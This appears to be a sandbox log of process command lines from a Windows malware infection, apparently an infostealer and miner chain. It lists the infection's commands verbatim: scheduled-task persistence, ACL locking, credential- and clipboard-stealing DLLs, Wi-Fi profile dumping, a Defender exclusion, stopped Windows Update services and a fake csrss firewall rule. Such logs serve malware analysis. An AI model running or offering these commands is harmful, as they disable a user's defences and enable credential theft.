"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2020,403383630516863929,8679515635207013333,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3280 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2020,403383630516863929,8679515635207013333,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3268 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2020,403383630516863929,8679515635207013333,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3224 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,403383630516863929,8679515635207013333,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3900 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff35c646f8,0x7fff35c64708,0x7fff35c64718

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,403383630516863929,8679515635207013333,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2952 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff35c646f8,0x7fff35c64708,0x7fff35c64718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,403383630516863929,8679515635207013333,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5228 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff35c646f8,0x7fff35c64708,0x7fff35c64718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,403383630516863929,8679515635207013333,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5080 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,403383630516863929,8679515635207013333,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5444 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff35c646f8,0x7fff35c64708,0x7fff35c64718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,403383630516863929,8679515635207013333,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5172 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0x78,0x108,0x7fff35c646f8,0x7fff35c64708,0x7fff35c64718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,403383630516863929,8679515635207013333,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5700 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff35c646f8,0x7fff35c64708,0x7fff35c64718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,403383630516863929,8679515635207013333,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5888 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,403383630516863929,8679515635207013333,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6344 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\3528.exe

C:\Users\Admin\AppData\Local\Temp\3528.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2020,403383630516863929,8679515635207013333,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6832 /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x504 0x514

C:\Users\Admin\AppData\Local\Temp\3CDA.exe

C:\Users\Admin\AppData\Local\Temp\3CDA.exe

C:\Users\Admin\AppData\Local\Temp\3EDF.exe

C:\Users\Admin\AppData\Local\Temp\3EDF.exe

C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\45C5.exe

C:\Users\Admin\AppData\Local\Temp\45C5.exe

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\925e7e99c5\pdates.exe

C:\Users\Admin\AppData\Local\Temp\925e7e99c5\pdates.exe

C:\Users\Admin\AppData\Local\Temp\kos4.exe

"C:\Users\Admin\AppData\Local\Temp\kos4.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\e8b5234212\Utsysc.exe

"C:\Users\Admin\AppData\Local\Temp\e8b5234212\Utsysc.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6336 -s 840

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6336 -ip 6336

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\Admin\AppData\Local\Temp\e8b5234212\Utsysc.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "Utsysc.exe" /P "Admin:N"&&CACLS "Utsysc.exe" /P "Admin:R" /E&&echo Y|CACLS "..\e8b5234212" /P "Admin:N"&&CACLS "..\e8b5234212" /P "Admin:R" /E&&Exit

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "Utsysc.exe" /P "Admin:N"

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\aca439ae61e801\cred64.dll, Main

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\aca439ae61e801\cred64.dll, Main

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\aca439ae61e801\clip64.dll, Main

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Windows\system32\tar.exe

tar.exe -cf "C:\Users\Admin\AppData\Local\Temp\350690463354_Desktop.tar" "C:\Users\Admin\AppData\Local\Temp\_Files_\*.*"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2020,403383630516863929,8679515635207013333,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=7520 /prefetch:8

C:\Windows\SysWOW64\cacls.exe

CACLS "Utsysc.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\e8b5234212" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\e8b5234212" /P "Admin:R" /E

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,403383630516863929,8679515635207013333,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7840 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,403383630516863929,8679515635207013333,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7684 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2020,403383630516863929,8679515635207013333,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8176 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2020,403383630516863929,8679515635207013333,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8176 /prefetch:8

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,403383630516863929,8679515635207013333,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7960 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,403383630516863929,8679515635207013333,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8240 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,403383630516863929,8679515635207013333,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8016 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,403383630516863929,8679515635207013333,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7180 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\Temp\C8D1.exe

C:\Users\Admin\AppData\Local\Temp\C8D1.exe

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\925e7e99c5\pdates.exe

C:\Users\Admin\AppData\Local\Temp\925e7e99c5\pdates.exe

C:\Users\Admin\AppData\Local\Temp\e8b5234212\Utsysc.exe

C:\Users\Admin\AppData\Local\Temp\e8b5234212\Utsysc.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0x8,0x108,0x7fff35c646f8,0x7fff35c64708,0x7fff35c64718

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,13706138524190011023,2434193042003868140,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,13706138524190011023,2434193042003868140,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,13706138524190011023,2434193042003868140,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2736 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,13706138524190011023,2434193042003868140,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,13706138524190011023,2434193042003868140,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,13706138524190011023,2434193042003868140,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4068 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,13706138524190011023,2434193042003868140,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4968 /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,13706138524190011023,2434193042003868140,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,13706138524190011023,2434193042003868140,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3548 /prefetch:1

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

